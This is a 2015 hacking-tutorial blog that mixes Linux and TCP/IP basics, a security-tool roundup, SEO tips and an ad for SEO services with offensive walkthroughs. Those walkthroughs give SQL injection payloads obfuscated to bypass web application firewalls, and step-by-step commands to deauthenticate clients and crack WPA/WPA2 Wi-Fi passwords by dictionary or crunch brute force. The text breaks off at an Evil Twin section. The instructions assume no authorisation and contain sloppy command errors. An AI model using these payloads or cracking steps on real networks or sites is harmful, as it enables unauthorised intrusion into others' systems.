Sunday, July 19, 2015

Linux


LINUX : 

is a Unix-like and mostly POSIX-compliant  computer operating system assembled under the model of free and open-source software development and distribution. The defining component of Linux is the Linux kernel, an operating system kernel first released on 5 October 1991 by Linus Torvalds. The Free Software Foundation uses the name GNU/Linux to describe the operating system.
Linux is the first truly free Unix-like operating system. The underlying GNU Project was launched in 1983 byRichard Stallman originally to develop a Unix-compatible operating system called GNU, intended to be entirely free software. Many programs and utilities were contributed by developers around the world, and by 1991 most of the components of the system were ready. Still missing was the kernel.
Linus Torvalds invented Linux itself in 1991. This kernel, which is called Linux, was afterwards combined with the GNU system to produce a complete free operating system.
Linux Kernel was bundled with many software's from various distributors and it gave rise to many flavors of  LINUX.



Features Of Linux OS:


1. Open Source- Free
2. Multitasking
3. Multi-User
4.Portable
5.Reliability
6.Scalability
7.Networking & Security

Network Hacking

Ways To Attack a Network:
Ping
The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name.  PING stands for “Packet Internet Groper” and is delivered with practically every
Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
 dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses
ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP
Echo reply packets.
All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping
(For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.

Ping Sweep
If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org) also contains an option
to perform ping sweeps.

Tracert: 
 Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure below.
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.

Go to DOS prompt and type tracert  
 (For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute


Port Scanning:-
After you have determined that your target system is alive the next  important step would be to perform a port scan on the target system.
There are a wide range of port scanners available for free. But many of  them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.


Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running,
firewalls being used and a lot more.

Common ports:
Below is a list of some common ports and the respective services
running on the ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
Besides the above ports they are even some ports known as Trojan
ports used by Trojans that allow remote access to that system.


Vulnerability Scanning:
Every operating system or the services will have some vulnerabilities due to the
programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is
an excellent mailing list discussing the vulnerabilities in the various system. The
exploit  code writers write exploit codes to exploit these vulnerabilities existing in a system.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.
Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com vulnerabilities and exploit codes of various
operating systems. Packet storm security
(http://www.packetstormsecurity.com) is also a nice pick.

Tools Descriptions:
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (Network Mapper) is a free open source utility for network exploration
or security auditing. It was designed to rapidly scan large networks, although
it works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use,
and dozens of other characteristics. Nmap runs on most types of computers and
both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (packet_trace). A very
versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-
server framework.
Nessus is the worlds most popular vulnerability scanner used in over 75,000
organizations world-wide. Many of the worlds largest organizations are
realizing significant cost savings by using Nessus to audit business-critical
enterprise devices and applications.

3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many
flavors of Unix (11 are officially supported, not counting different
architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect
weak Unix passwords. Besides several crypt(3) password hash types most commonly
found on various Unix flavors, supported out of the box are Kerberos AFS and
Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here - http://www.openwall.com/john/

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 3200 potentially
dangerous files/CGIs, versions on over 625 servers, and version specific
problems on over 230 servers. Scan items and plugins are frequently updated and
can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto
(focus on http fingerprinting or Google hacking/info gathering etc, another
article for just those).

5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the
highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I
suggest you check this out, it’s pretty nice.
Get SuperScan Here - http://www.foundstone.com/index.htm
subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan4.htm

6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the
operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY
active connections to the target machine.

7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you
capture and interactively browse the contents of network frames. The goal of
the project is to create a commercial-quality analyzer for Unix and to give
Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can
reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here - http://www.wireshark.org/

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in
different Layer 2 protocols. It pretends to be a solid framework for analyzing
and testing the deployed networks and systems. Currently, the following network
protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery
Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration
Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch
Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
Get Yersinia Here - http://yersinia.sourceforge.net/

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to
completely remove sensitive data from your hard drive by overwriting it several
times with carefully selected patterns. Works with Windows 95, 98, ME, NT,
2000, XP and DOS. Eraser is Free software and its source code is released under
GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make
sure it’s really gone, you don’t want it hanging around to bite you in the ass.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms,
along with an xterm terminal emulator. A must have for any h4. 0r wanting to
telnet or SSH from Windows without having to use the crappy default MS command
line clients.

11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in
Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute
force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack
article.

12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network,
cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis
attacks, recording VoIP conversations, decoding scrambled passwords, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
The program does not exploit any software vulnerabilities or bugs that could
not be fixed with little effort.
Get Cain and Abel Here - http://www.oxid.it/cain.html

13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion
detection system. Kismet will work with any wireless card which supports raw
monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco
gold).

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux
counterparts, but it’s easy to use and has a nice interface, good for the
basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized rogue access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here - http://www.stumbler.net/
15. Hping
To finish off, something a little more advanced if you want to test your TCP/IP
packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping unix command, but hping isn’t only able to
send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a
traceroute mode, the ability to send files between a covered channel, and many
other features.
Get hping Here - http://www.hping.org/

Bypass Web Application Firewalls

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass Web application firewall  (WAF).

Sqli
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— -

By passed Sqli
http://
xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— -


By Function 
Capitalization:-
Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass  by case changing.

Actual query
http://
xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—

Query to bypass the WAF

http://
xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5—


By Replaced Keywords:-

Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another like below script.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—


Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- - 

We hope you enjoyed this trick.

Search engine optimization or SEO



Search engine optimization or SEO is the hottest way to drive targeted traffic to your website. Maximizing the benefits of a well optimized website will yield lots of earnings for the marketer. However, optimizing your site might cost you thousands of dollars if you are not skilled in this area.

But to tell you the truth, you can essentially get information on low cost SEO anywhere in the Internet. But only several really show you how to work out an affordable search engine optimization endeavor. And those few that really inform include this article. 

Keyword Research Tools
-------------------------------
You must do keyword research before you start optimizing your site, that much is obvious, but what tools should you use?
There are two excellent keyword research tools that I can recommend as professional tools. They are Wordtracker and Keyword Discovery. Both are great and both are different. Firstly start with with Wordtracker and then move over to Keyword Discovery after a year or so.

If you optimize a site with the wrong keywords you may end up with a high ranking site but won't convert your traffic! Correctly identifying the best keywords and search terms using a keyword search tool will help your odds of success and give you a fighting chance to target prospects who are more likely to turn into clients.

Check it out if you would like more information.
1. http://www.wordtracker.com/
2. http://www.keyworddiscovery.com/
3. http://www.seoscribe.com/

Use The META Description Tag
----------------------------------------
All websites should use the HTML description tag. If you have too many pages to add it to, at least put in on your home page and any core pages that bring in search result traffic. Google will use the META description you place on your site if the user searched for a keyword that exists in the META description. Google is giving us some measure of control.

Create a Website Sitemap

-------------------------------
Some SEO tips can be hard to explain, but this is one of the few that is relatively easy to do and can be done manually with small or large sites. Create a sitemap of your website. There are a few good reasons to do this.
It allows easier indexing of your site by the search engines.
In other words, it helps the search engines to find all the pages on your site. Some websites only have a few of their pages in the search engines and this can be due to poor linking, sparse navigation or a host of other reasons.
It provides PageRank or link popularity to all pages it links to.
If you read about SEO then you have read how important it is to have high-quality links poiting to your site from the sites.
A sitemap can become another source of quality links with descriptive text for your own pages. Making navigation easier by including a sitemap is just good business sense as well as SEO sense.

Example: http://www.xyz.com/sitemap/


Duplicate Content & URL Canonicalization
-------------------------------------------------------
Before we get into this exclusive tip, let me provide a definition for the term Canonicaliztion.
"It is the process of converting data that has more than one possible representation into a standard canonical representation."
If your site has multiple pages with the same content possibly through a Content Management System(CMS) or through duplicate navigation, or because it actually exists in multiple versions, you could be hurting your search engine ranking results. 

Most often this problem can be found on a site's homepage. For example: Search engines view your homepage as having more than one version. How? take a look at the following urls. All point to the same page, but to the search engines they are different. http://www.yoursite.com, http://yoursite.com, http://yoursite.com/index.html and http://www.yoursite.com/index.html. The search engines may find up to four home pages that have the same content.
While this may not cause your site to be unranked it is certainly not helping and can easily cause poor rankings. That is shame for something that is so easily corrected. Most often this is caused by links pointing to different versions of your site. You can't change all the links coming into your site, but you can use the 301-redirect to solve this by pointing all versions of your homepage to the full url.

You can read more at the following links:
1. http://en.wikipedia.org/wiki/Canonicalization 
2. http://www.bigoakinc.com/blog/how-to-do-a-301-redirect/




Social Bookmarking
-------------------------
Social bookmarking involves saving bookmarks (web addresses) to public Web site such as Digg or Del.icio.us so you can access these bookmarks from any computer connected to the web. Your favorite bookmarks are also available for others to view and follow as well, hence the social aspect. If you wish to create your own social bookmarks, you must register with a social bookmarking site.
Bookmark sites you generally would like to share or feel are valuable, which of course can contain bookmarked web addresses of your own site. If enough people agree with the value of a bookmark you have placed they will bookmark it to and as the popularity grows your site traffic will grow.
Don't abuse this by submitting every page of your site, try to be judicious and think about what pages of your site may be helpful and of interest to other web surfers.

Here are some of the more popular social bookmarking sites:
1. Digg
2. Del.icio.us
3. StumbleUpon
4. Reddit
5. Squidoo

Get To Know Google Services
------------------------------------
What would an SEO Consultant's life be like without Google?
I've listed many services that Google offers and I'm sure you may be a bit surprised at how many different pies the search giant's thumb is actuall in.
Google Webmasters: http://www.google.com/webmasters
Google Analytics:     http://www.google.com/analytics
Google AdSense:       http://www.google.com/adsense
Google Answers:       http://answers.google.com/
Google Blog Search:  http://blogsearch.google.com/
Google Bookmarks:  http://www.google.com/bookmarks
Google Directory:     http://www.google.com/dirhp
Google Groups:         http://groups.google.com/
Google Sitemaps:      http://www.google.com/webmasters/sitemaps/


Search Engine & Directory Submissions

-----------------------------------------------------------
Directories are an easy way to build links because anyone can submit age get listed. Directories can, therefore, be of little use for the same reason. Of course getting in directories can be time consuming but it is a one-time affair and usually worth the time. They provide one-way links which will increase your online presence. Not all directories are created equal and paying for the better ones is often money well spent.

Select the best category for your site and follow the instructions on the submission form carefully. Write your descriptions without sensational text. Descriptions of sites should describe the content of the site concisely and accurately When submitting to directories, make sure to vary anchor text and use keywords in the description and title fields.

Choose the most appropriate category for your site. Finding a category that best matches your site's theme or content will increase traffic from the directory and provide higher quality one-way link to your-site for the search engines to follow.

A few of the more search engine friendly directories for valuable links are the following:
1. http://dir.search.yahoo.com/?fr=yfp-t-501
2. http://www.dmoz.org/
3. http://www.business.com/
4. http://bestoftheweb.com/
5. http://www.avivadirectory.com/


We are providing SEO Services..

Is your website submit to all search engines. ?
Do you have a require keywords according to your website ?
Do you want to do SEO for your website ?

Contact us for more details
mail to pathak.munjal@gmail.com

Find Out If Any One Opens Your Computer Without Your Permission

How to Know Who Logged into your computer and when?

In Windows, there is one in-built too will records all events in your computer called “Event Viewer”. This application records all your computer activities from login to log off etc.

The Event Viewer can be accessed in all Windows Operating system including Windows XP, Vista, Windows 7 and Windows 8.
Here, I”ll show you how to find the login events in Windows 8. To open the Event Viewer, type the eventvwr.msc in Run Command (Open run command Press Win + R Keys ) and press enter.
Now the Event Viewer utility will open, and many logs will be shown to you. To get login events of you computer click Windows logs -> System in the left panel.
The System log will show all the logs from kernel, Wireless network service start. There you can also find out the login event “Winlogon”. Just click the login event to display the properties of that event in the panel below.
In the properties, you can get the much needed information such as Login time, user account, event ID.
Note : If you have found that someone has accessed your computer, change your user password immediately with complex one and scan your computer with Best Antivirus applications and Anti-malware security applications, remove threats if you found.

Friday, July 17, 2015

Learn TCP/IP


                                                             

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.

For Check Your IP Address..

for see another IP address

Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process..

Internet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
Your Browser and Server use TCP/IP
Browsers and servers use TCP/IP to connect to the Internet.
A browser uses TCP/IP to access a server. A server uses TCP/IP to send HTML back to a browser.
Your E-Mail uses TCP/IP
Your e-mail program uses TCP/IP to connect to the Internet for sending and receiving e-mails.
Your Internet Address is TCP/IP
Your Internet address "192.168.10.14" is a part of the standard TCP/IP protocol (and so is your domain name).


What is TCP/IP?
TCP/IP is the communication protocol for communication between computers on the Internet.
TCP/IP stands for Transmission Control Protocol / Internet Protocol.
TCP/IP defines how electronic devices (like computers) should be connected to the Internet, and how data should be transmitted between them.


Inside TCP/IP
Inside the TCP/IP standard there are several protocols for handling data communication:
  • TCP (Transmission Control Protocol) communication between applications
  • UDP (User Datagram Protocol) simple communication between applications
  • IP (Internet Protocol) communication between computers
  • ICMP (Internet Control Message Protocol) for errors and statistics
  • DHCP (Dynamic Host Configuration Protocol) for dynamic addressing


TCP Uses a Fixed Connection
TCP is for communication between applications.
If one application wants to communicate with another via TCP, it sends a communication request. This request must be sent to an exact address. After a "handshake" between the two applications, TCP will set up a "full-duplex" communication between the two applications.
The "full-duplex" communication will occupy the communication line between the two computers until it is closed by one of the two applications.
UDP is very similar to TCP, but simpler and less reliable.


IP is Connection-Less
IP is for communication between computers.
IP is a "connection-less" communication protocol.
IP does not occupy the communication line between two computers. IP reduces the need for network lines. Each line can be used for communication between many different computers at the same time.
With IP, messages (or other data) are broken up into small independent "packets" and sent between computers via the Internet.
IP is responsible for "routing" each packet to the correct destination.

IP Routers
When an IP packet is sent from a computer, it arrives at an IP router.
The IP router is responsible for "routing" the packet to the correct destination, directly or via another router.
The path the packet will follow might be different from other packets of the same communication. The router is responsible for the right addressing, depending on traffic volume, errors in the network, or other parameters.


Connection-Less Analogy
Communicating via IP is like sending a long letter as a large number of small postcards, each finding its own (often different) way to the receiver.


TCP/IP
TCP/IP is TCP and IP working together.
TCP takes care of the communication between your application software (i.e. your browser) and your network software.
IP takes care of the communication with other computers.
TCP is responsible for breaking data down into IP packets before they are sent, and for assembling the packets when they arrive.
IP is responsible for sending the packets to the correct destination.

IP Addresses
Each computer must have an IP address before it can connect to the Internet.
Each IP packet must have an address before it can be sent to another computer.
IP addess is the identity of computer or website.

Domain Names
A name is much easier to remember than a 12 digit number.
Names used for TCP/IP addresses are called domain names.
google.com is a domain name.
When you address a web site, like http://www.google.com, the name is translated to a number by a Domain Name Server (DNS).
All over the world, DNS servers are connected to the Internet. DNS servers are responsible for translating domain names into TCP/IP addresses.
When a new domain name is registered together with a TCP/IP address, DNS servers all over the world are updated with this information.
TCP - Transmission Control Protocol
TCP is used for transmission of data from an application to the network.
TCP is responsible for breaking data down into IP packets before they are sent, and for assembling the packets when they arrive.


IP - Internet Protocol
IP takes care of the communication with other computers.
IP is responsible for the sending and receiving data packets over the Internet.


HTTP - Hyper Text Transfer Protocol
HTTP takes care of the communication between a web server and a web browser.
HTTP is used for sending requests from a web client (a browser) to a web server, returning web content (web pages) from the server back to the client.


HTTPS - Secure HTTP
HTTPS takes care of secure communication between a web server and a web browser.
HTTPS typically handles credit card transactions and other sensitive data.


SSL - Secure Sockets Layer
The SSL protocol is used for encryption of data for secure data transmission.


SMTP - Simple Mail Transfer Protocol
SMTP is used for transmission of e-mails.


MIME - Multi-purpose Internet Mail Extensions
The MIME protocol lets SMTP transmit multimedia files including voice, audio, and binary data across TCP/IP networks.


IMAP - Internet Message Access Protocol
IMAP is used for storing and retrieving e-mails.


POP - Post Office Protocol
POP is used for downloading e-mails from an e-mail server to a personal computer.


FTP - File Transfer Protocol
FTP takes care of transmission of files between computers.


NTP - Network Time Protocol
NTP is used to synchronize the time (the clock) between computers.


DHCP - Dynamic Host Configuration Protocol
DHCP is used for allocation of dynamic IP addresses to computers in a network.


SNMP - Simple Network Management Protocol
SNMP is used for administration of computer networks.


LDAP - Lightweight Directory Access Protocol
LDAP is used for collecting information about users and e-mail addresses from the internet.


ICMP - Internet Control Message Protocol
ICMP takes care of error-handling in the network.


ARP - Address Resolution Protocol
ARP is used by IP to find the hardware address of a computer network card based on the IP address.


RARP - Reverse Address Resolution Protocol
RARP is used by IP to find the IP address based on the hardware address of a computer network card.


BOOTP - Boot Protocol
BOOTP is used for booting (starting) computers from the network.


PPTP - Point to Point Tunneling Protocol
PPTP is used for setting up a connection (tunnel) between private networks.

When you write an email, you don't use TCP/IP.
When you write an email, you use an email program like Lotus Notes, Microsoft Outlook or Netscape Communicator.


Your Email Program Does
Your email program uses different TCP/IP protocols:
  • It sends your emails using SMTP
  • It can download your emails from an email server using POP
  • It can connect to an email server using IMAP


SMTP - Simple Mail Transfer Protocol
The SMTP protocol is used for the transmission of e-mails. SMTP takes care of sending your email to another computer.
Normally your email is sent to an email server (SMTP server), and then to another server or servers, and finally to its destination.
SMTP can only transmit pure text. It cannot transmit binary data like pictures, sounds or movies.
SMTP uses the MIME protocol to send binary data across TCP/IP networks. The MIME protocol converts binary data to pure text.


POP - Post Office Protocol
The POP protocol is used by email programs (like Microsoft Outlook) to retrieve emails from an email server.
If your email program uses POP, all your emails are downloaded to your email program (also called email client), each time it connects to your email server.


IMAP - Internet Message Access Protocol
The IMAP protocol is used by email programs (like Microsoft Outlook) just like the POP protocol.
The main difference between the IMAP protocol and the POP protocol is that the IMAP protocol will not automatically download all your emails each time your email program connects to your email server.
The IMAP protocol allows you to look through your email messages at the email server before you download them. With IMAP you can choose to download your messages or just delete them. This way IMAP is perfect if you need to connect to your email server from different locations, but only want to download your messages when you are back in your office.

WPA/WPA2 wifi cracking

How to Crack WPA/WPA2 Protected Wi-Fi with dictionary


1.  Start kali linux and open terminal in kali linux.

2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)

4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)

5.  Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
              (This means airodump-ng has successfully captured the handshake.

6.  Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
              [Send directed DeAuth (attack is more effective when it is targeted) ].

7.  Type command:   aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap
            [ -w=The name of the dictionary file
             -b=The MAC address of the access point
              MTNL.cap=The name of the file that contains the authentication handshake ]

[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]


Steps to attach dictionery


1. cp /usr/share/wordlists/rockyou.txt.gz  (copy the file to root directory)
2. gunzIP rockyou.txt.gz    (UnzIP the file)
3. mv newrockyou.txt wordlist.lst    (rename the file from newrockyou to wordlist)


How to Crack WPA/WPA2 Protected Wi-Fi without dictionary


1.  Start kali Linux and open terminal in kali Linux.

2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)

4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)

5.  Type command : airodump-ng –w File name of packet –c Target channel no  --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL –c 3  - -bssid 11:22:33:44:55:66 mon0)
              (This means airodump-ng has successfully captured the handshake.

6.  Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
              [Send directed DeAuth (attack is more effective when it is targeted) ].

7.  Type command:crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng  --bssid 11:22:33:44:55 :66  -w  MTNL.cap
              [a).crunch: cruch is used to crack wifi without dictionary as crunch automatically generate the wordlists. working of crunch is similar to brute force attack. It try all possible combination referred by user to crack password.
                b). 8 12=It indicates minimum length of password is 8 and maximum length of password is 12.it generate the wordlist starting  with 8 character and maximum with 12 character.
                c).wordlist contain all lowercase a-z, uppercase A-Z, Number 0-9 as user defined.
                d).-bssid : specifies the target MAC address
                e). MTNL.cap is the handshake file on which client perform attack.

Evil Twin attack

Evil Twin Attack is attack is frequently carried upon wireless access points with malicious intentions. This attack happens when...